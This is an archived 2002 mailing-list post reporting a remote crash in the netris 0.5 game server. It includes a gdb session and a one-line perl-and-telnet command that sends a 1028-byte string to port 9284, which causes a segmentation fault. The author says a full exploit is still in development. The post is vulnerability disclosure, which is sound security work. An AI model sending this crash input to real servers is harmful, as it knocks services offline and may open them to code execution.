netris-0.5.

From: Artur Byszko / bajkero (bajkero@security.hack.pl)
Date: 09/09/02


Date: Mon, 9 Sep 2002 06:55:38 +0200
From: Artur Byszko / bajkero <bajkero@security.hack.pl>
To: vuln-dev@securityfocus.com


hi.

i found remote bug in latest version of netris(0.5)..

(apocalypse:~)% gdb netris
GNU gdb 4.18 (FreeBSD)
[..]
(gdb) r -w
Starting program: /usr/local/bin/netris -w
(no debugging symbols found)...(no debugging symbols found)...

***
on second terminal:
(apocalypse:~)% perl -e '{print "a"x"1028"}' | telnet localhost 9284
***

Your opponent is using an old, incompatible version
of Netris. They should get the latest version.
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x28138fd5 in getenv () from /usr/lib/libc.so.4

exploit code is still under developing.. ;)

sorry for my terrible english.

best regards,

-- 
* Artur Byszko * \x62\x61\x6a\x6b\x65\x72\x6f *




Relevant Pages

  • RE: stack overflow help ..
    ... GNU gdb Red Hat Linux ... Reading symbols from shared object read from target ... (no debugging symbols found)...(no debugging symbols ...
    (Security-Basics)
  • Re: XMMS or SCHED_ULE issue?
    ... Right after 'continue' in gdb, ... This GDB was configured as "i386-marcel-freebsd"...(no debugging symbols ... Reading symbols from /usr/X11R6/lib/libXext.so.6...(no debugging symbols ... Loaded symbols for /usr/X11R6/lib/libXext.so.6 ...
    (freebsd-current)
  • RE: stack overflow help ..
    ... Do an "info frame" in gdb. ... (no debugging symbols found)...(no debugging symbols ... Program received signal SIGSEGV, Segmentation fault. ...
    (Security-Basics)
  • Re: Tcl Thread
    ... stuck for at least 5-7 minutes before I ran strace and gdb. ... Reading symbols from /usr/lib/libtcl8.5.so...(no debugging symbols ... Loaded symbols for /usr/lib/libtcl8.5.so ...
    (comp.lang.tcl)
  • Re: Tcl Thread
    ... stuck for at least 5-7 minutes before I ran strace and gdb. ... Reading symbols from /usr/lib/libtcl8.5.so...(no debugging symbols ... Loaded symbols for /usr/lib/libtcl8.5.so ...
    (comp.lang.tcl)

Quantcast